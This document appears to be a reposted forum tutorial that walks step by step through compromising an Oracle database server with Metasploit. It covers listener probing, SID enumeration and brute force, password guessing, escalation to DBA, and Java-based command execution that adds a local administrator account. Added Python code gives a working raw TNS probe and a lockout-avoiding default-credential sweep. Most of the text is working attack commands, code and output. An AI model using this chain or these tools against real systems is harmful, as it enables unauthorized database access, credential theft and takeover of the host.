
attack oracle with metasploit

April 7, 2010, by xion, 4,965 views

Source: http://www.milsec.net/viewtopic.php?id=42

Topic: attack oracle with metasploit. One weak Oracle password is enough to take over the target, provided the weak-password account holds the RESOURCE role.
1. Query the TNS listener version. Nmap 5 works as well.

 
msf > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.1.10 is running: 32-bit Windows: Version 10.1.0.2.0 - Production
[*] Auxiliary module execution completed
mickey@pentest:~$ sudo nmap -sV -p1521 192.168.1.10
[sudo] password for mickey:
Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-30 00:53 CST
Interesting ports on localhost (192.168.1.10):
PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS Listener 10.1.0.2.0 (for 32-bit Windows)
MAC Address: 00:0C:29:49:E7:AE (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.44 seconds
2. SID enumeration. On Oracle 9.2.0.8 and later this query no longer works, so the SID has to be guessed or brute-forced.
msf > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) > set RHOSTS 222.231.61.55
RHOSTS => 222.231.61.55
msf auxiliary(sid_enum) > run
[*] Identified SID for 222.231.61.55: CANKIDS
[*] Identified SERVICE_NAME for 222.231.61.55: CANKIDS
[*] Auxiliary module execution completed
3. Enumerate the SID through Oracle XML DB (port 8080). The module logs in to XDB with DBUSER/DBPASS, so it needs a valid database account.
msf > use auxiliary/scanner/oracle/xdb_sid
msf auxiliary(xdb_sid) > set DBUSER sys
DBUSER => sys
msf auxiliary(xdb_sid) > set DBPASS mickey
DBPASS => mickey
msf auxiliary(xdb_sid) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(xdb_sid) > run
[*] Discovered SID: 'ORCL' for host 192.168.1.10
[*] Auxiliary module execution completed
msf auxiliary(xdb_sid) >
4. Obtain the SID from the Enterprise Manager console (port 1158).
msf > use auxiliary/scanner/oracle/emc_sid
msf auxiliary(emc_sid) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf auxiliary(emc_sid) > run
[*] Discovered SID: 'mickey' for host 192.168.1.20
[*] Auxiliary module execution completed
5. SID brute force.
msf > use auxiliary/admin/oracle/sid_brute
msf auxiliary(sid_brute) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(sid_brute) > run
[*] Starting brute force on 192.168.1.10, using sids from /home/mickey/Pentest/exploit/framework-3.2/msf3/data/wordlists/sid.txt...
[*] Found SID 'PLSExtProc' for host 192.168.1.10.
[*] Found SID 'ORCL' for host 192.168.1.10.
[*] Auxiliary module execution completed
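The listener probes in steps 1, 2 and 5 all send the same kind of TNS CONNECT packet and differ only in the connect data inside it. The following is an added example, not code from the original post or from Metasploit: a small Python probe that builds that packet, asks the listener for its VERSION, decodes the VSNNUM it answers with (168821248 is 10.1.0.2.0, the version seen above), and tells a known SID from an unknown one by the ORA-12505/12514 refusal, which is the same test sid_brute relies on. The field constants in the connect packet are the values TNS probing tools commonly send and are an assumption here; the host and SIDs come from the command line, and the sample replies at the bottom are constructed, not captured from a real host.

```python
"""Raw TNS listener probing: the VERSION query (step 1) and the SID check
behind sid_enum/sid_brute (steps 2 and 5), without Metasploit or nmap.

Added example, not code from the original post or from Metasploit. The
connect-packet field values are the ones TNS probing tools commonly send and
are an assumption here; host and SID names come from the command line.
"""
import re
import socket
import struct
import sys

TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT = 1, 2, 4, 5
CONNECT_DATA_OFFSET = 58          # 8-byte header + 50 bytes of fixed fields
VERSION_CMD = b"(CONNECT_DATA=(COMMAND=VERSION))"


def tns_packet(connect_data: bytes) -> bytes:
    """Build a TNS CONNECT packet (all fields big-endian) carrying connect_data."""
    fields = struct.pack(
        ">10H",
        0x0136, 0x012C,            # protocol version / lowest compatible version
        0x0000, 0x0800,            # service options / session data unit size
        0x7FFF, 0x7F08,            # max transmission unit / NT protocol characteristics
        0x0000, 0x0001,            # line turnaround / the value 1 (byte-order probe)
        len(connect_data), CONNECT_DATA_OFFSET,
    )
    fields += b"\x00" * 4          # max receivable connect data
    fields += b"\x00" * 2          # ANO flags
    fields += b"\x00" * 24         # trace cross-facility / unique connection ids
    total = 8 + len(fields) + len(connect_data)
    header = struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0)
    return header + fields + connect_data


def sid_connect_data(sid: str) -> bytes:
    """Connect data for a plain SID probe, as a JDBC-style client would send it."""
    return b"(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))" % sid.encode()


def tns_exchange(host: str, connect_data: bytes, port: int = 1521, timeout: float = 5.0) -> bytes:
    """Send one CONNECT packet and collect whatever the listener answers."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(tns_packet(connect_data))
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def decode_vsnnum(n: int) -> str:
    """VSNNUM packs the version as 8.4.8.4.8 bits: 168821248 == 0x0A100200 -> 10.1.0.2.0."""
    return "%d.%d.%d.%d.%d" % ((n >> 24) & 0xFF, (n >> 20) & 0xF,
                               (n >> 12) & 0xFF, (n >> 8) & 0xF, n & 0xFF)


def parse_version_reply(raw: bytes) -> dict:
    """Extract the numeric version, the ERR code and the TNSLSNR banner from a VERSION reply."""
    out = {"version": None, "err": None, "banner": None}
    m = re.search(rb"\(VSNNUM=(\d+)\)", raw)
    if m:
        out["version"] = decode_vsnnum(int(m.group(1)))
    m = re.search(rb"\(ERR=(\d+)\)", raw)
    if m:
        out["err"] = int(m.group(1))
    m = re.search(rb"TNSLSNR for ([^\r\n\x00]+)", raw)
    if m:
        out["banner"] = m.group(1).decode("latin-1").strip()
    return out


def sid_is_known(raw: bytes) -> bool:
    """REFUSE carrying ORA-12505/12514 means the listener does not know the SID
    or service; ACCEPT, REDIRECT or a REFUSE for any other reason means it does."""
    if len(raw) < 8:
        return False
    ptype = raw[4]
    if ptype == TNS_REFUSE:
        return re.search(rb"\(ERR=(12505|12514)\)", raw) is None
    return ptype in (TNS_ACCEPT, TNS_REDIRECT)


# Constructed sample replies (not captured from a real host) for the self-check below.
SAMPLE_VERSION_REPLY = (b"(DESCRIPTION=(TMP=)(VSNNUM=168821248)(ERR=0))"
                        b"TNSLSNR for 32-bit Windows: Version 10.1.0.2.0 - Production\n")
_refuse_body = b"(DESCRIPTION=(TMP=)(VSNNUM=168821248)(ERR=12505)(ERROR_STACK=(ERROR=(CODE=12505)(EMFI=4))))"
SAMPLE_REFUSE_12505 = (struct.pack(">HHBBH", 12 + len(_refuse_body), 0, TNS_REFUSE, 0, 0)
                       + b"\x01\x00" + struct.pack(">H", len(_refuse_body)) + _refuse_body)
SAMPLE_ACCEPT = struct.pack(">HHBBH", 10, 0, TNS_ACCEPT, 0, 0) + b"\x01\x36"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: tns_probe.py HOST [SID ...]")
    host = sys.argv[1]
    print(parse_version_reply(tns_exchange(host, VERSION_CMD)))
    for sid in sys.argv[2:]:
        known = sid_is_known(tns_exchange(host, sid_connect_data(sid)))
        print(f"{sid}: {'known' if known else 'unknown'}")
```

Run it as `python3 tns_probe.py 192.168.1.10 ORCL PLSExtProc`. The VERSION command is still answered by 10g listeners that refuse the status-style query behind sid_enum, which is why step 1 keeps working where step 2 does not; the SID probe works against any listener because it is just a normal connection attempt, so on a live target each guess also lands in the listener log.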
6. Brute-force the login credentials.
msf > use auxiliary/admin/oracle/login_brute
msf auxiliary(login_brute) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(login_brute) > set SID ORCL
SID => ORCL
msf auxiliary(login_brute) > run
[-] The dbi module is not available!
[-] The dbi module is not available!
If you get the message above, the Oracle modules are missing their Ruby DBI/OCI8 dependencies; see https://metasploit.com/trac/wiki/OracleUsage for the setup.
msf auxiliary(login_brute) > run
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[*] Found user/pass of: SCOTT/TIGER on 192.168.1.10 with sid ORCL
[-] ORA-28000: the account is locked
[-] ORA-28000: the account is locked
[-] ORA-28000: the account is locked
[-] ORA-28000: the account is locked
[*] Auxiliary module execution completed
The credentials found are also logged under framework-3.2/msf3/data/wordlists:
mickey@pentest:~/Pentest/exploit/framework-3.2/msf3/data/wordlists$ cat oracle_default_found.log
Found user/pass of: SCOTT/TIGER on 192.168.1.10 with sid ORCL.
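The login_brute output above shows the cost of blind guessing: after the SCOTT/TIGER hit, every remaining line is ORA-28000, meaning the module kept trying accounts that were already locked (or that it had just locked). The following is an added example, not code from the original post or from Metasploit, of a default-credential sweep that retires an account after a lock, a success, or a small failure budget, so the sweep does not lock every default account on a production database. The DEFAULT_CREDS list is a constructed excerpt in the shape of Metasploit's oracle_default_userpass.txt, the python-oracledb connector is an assumption (pip install oracledb) and is not exercised offline, and the simulated connector plus the SCOTT/TIGER scenario at the bottom are constructed for the run.

```python
"""Default-credential sweep that respects account lockout.

Added example, not from the original post or Metasploit. login_brute keeps
trying a user after ORA-28000; this version retires an account after a lock,
a success, or a small failure budget. The python-oracledb connector is an
assumption (pip install oracledb); the simulated connector runs offline.
"""
ORA_BAD_CREDS = 1017    # invalid username/password; logon denied
ORA_LOCKED = 28000      # the account is locked
ORA_EXPIRED = 28001     # the password has expired (so it was correct)

# Constructed excerpt in the shape of Metasploit's oracle_default_userpass.txt.
DEFAULT_CREDS = [
    ("SYS", "CHANGE_ON_INSTALL"), ("SYSTEM", "MANAGER"), ("SCOTT", "TIGER"),
    ("DBSNMP", "DBSNMP"), ("OUTLN", "OUTLN"), ("SCOTT", "SCOTT"),
    ("SYSTEM", "ORACLE"),
]


class OracleError(Exception):
    """Carries the ORA-xxxxx code so callers can branch on it."""
    def __init__(self, code: int, message: str = ""):
        super().__init__(f"ORA-{code:05d}: {message}")
        self.code = code


def sweep(connect, creds, max_failures_per_user: int = 3):
    """Try each (user, password) once. Returns (found, retired_users).

    An account is retired after a success, a lock, or max_failures_per_user
    bad passwords. The 10g DEFAULT profile ships FAILED_LOGIN_ATTEMPTS=10, so
    the budget keeps a sweep well below the lock threshold."""
    found, retired, failures = [], set(), {}
    for user, password in creds:
        user = user.upper()
        if user in retired:
            continue
        try:
            connect(user, password)
        except OracleError as err:
            if err.code == ORA_LOCKED:
                retired.add(user)                 # no more attempts on a locked account
            elif err.code == ORA_EXPIRED:
                found.append((user, password))    # password accepted, just expired
                retired.add(user)
            elif err.code == ORA_BAD_CREDS:
                failures[user] = failures.get(user, 0) + 1
                if failures[user] >= max_failures_per_user:
                    retired.add(user)
            else:
                raise
        else:
            found.append((user, password))
            retired.add(user)
    return found, sorted(retired)


def oracledb_connector(host: str, sid: str, port: int = 1521):
    """Real connector: assumes python-oracledb is installed and can reach the SID."""
    import oracledb  # imported lazily so the offline path needs no driver
    dsn = oracledb.makedsn(host, port, sid=sid)

    def connect(user, password):
        try:
            oracledb.connect(user=user, password=password, dsn=dsn).close()
        except oracledb.DatabaseError as exc:
            error = exc.args[0]
            raise OracleError(error.code, error.message) from exc
    return connect


def simulated_connector(truth: dict, locked=()):
    """Offline stand-in: `truth` maps USER -> real password, `locked` lists locked users."""
    def connect(user, password):
        if user in locked:
            raise OracleError(ORA_LOCKED, "the account is locked")
        if truth.get(user) != password:
            raise OracleError(ORA_BAD_CREDS, "invalid username/password; logon denied")
    return connect


if __name__ == "__main__":
    # Constructed scenario mirroring the post's output: SCOTT/TIGER is valid, SYSTEM is locked.
    connect = simulated_connector({"SCOTT": "TIGER"}, locked={"SYSTEM"})
    found, retired = sweep(connect, DEFAULT_CREDS)
    print("found:", found)
    print("retired:", retired)
```

Keep `max_failures_per_user` under the target profile's FAILED_LOGIN_ATTEMPTS (10 in the 10g DEFAULT profile; check DBA_PROFILES as soon as you have any login), and count ORA-28001 as a hit, since Oracle only reports an expired password after accepting it.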
7. Execute SQL statements. DBUSER, DBPASS and SID are not set here because the module defaults (scott/tiger, SID ORCL) match the account found in step 6, and the default statement is select * from v$version.
msf > use auxiliary/admin/oracle/sql
msf auxiliary(sql) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(sql) > run
[*] Sending statement: 'select * from v$version'...
[*] Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Prod
[*] PL/SQL Release 10.1.0.2.0 - Production
[*] CORE              10.1.0.2.0              Production
[*] TNS for 32-bit Windows: Version 10.1.0.2.0 - Production
[*] NLSRTL Version 10.1.0.2.0 - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(sql) > run
[*] Sending statement: 'select * from user_role_privs'...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(sql) >
8. Privilege escalation. The droptable_trigger module only writes a SQL script; the attack runs when that script is executed as the low-privileged user.
msf > use auxiliary/admin/oracle/droptable_trigger
msf auxiliary(droptable_trigger) > run
[*] Creating 'msf.sql' file ...
[*] Generated output file /home/mickey/Pentest/exploit/framework-3.2/msf3/data/exploits/msf.sql
[*] Auxiliary module execution completed
Feed the generated msf.sql to SQL*Plus as the low-privileged account to escalate:
mickey@pentest:~/Pentest/exploit/framework-3.2/msf3/data/exploits$ sqlplus scott/tiger@192.168.1.10/orcl <msf.sql
Disconnect and reconnect: the account now holds DBA. Then grant it JAVASYSPRIV, which the Java-based command execution in the next step needs:
mickey@pentest:~/Pentest/exploit/framework-3.2/msf3/data/exploits$ sqlplus scott/tiger@192.168.1.10/orcl
SQL*Plus: Release 10.2.0.4.0 - Production on Thu Jul 30 04:40:31 2009
Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> grant javasyspriv to scott;
Grant succeeded.
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          JAVASYSPRIV                    NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
9. Execute operating-system commands. The module creates a Java source and a wrapper procedure (which is why JAVASYSPRIV was granted), runs the command through them, and removes both afterwards:
msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf auxiliary(win32exec) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf auxiliary(win32exec) > set CMD “net user pt007 shad@w /add && net localgroup administrators pt007 /add”
CMD => net user pt007 shad@w /add && net localgroup administrators pt007 /add
msf auxiliary(win32exec) > run
[*] Creating java source 'VDBOOEEQ'...
[*] Done...
[*] Creating procedure 'KIXWXLFQ'...
[*] Done...
[*] Sending command: 'net user pt007 shad@w /add && net localgroup administrators pt007 /add'
[*] Done...
[*] Removing java source 'VDBOOEEQ'...
[*] Done...
[*] Removing procedure 'KIXWXLFQ'...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(win32exec) >
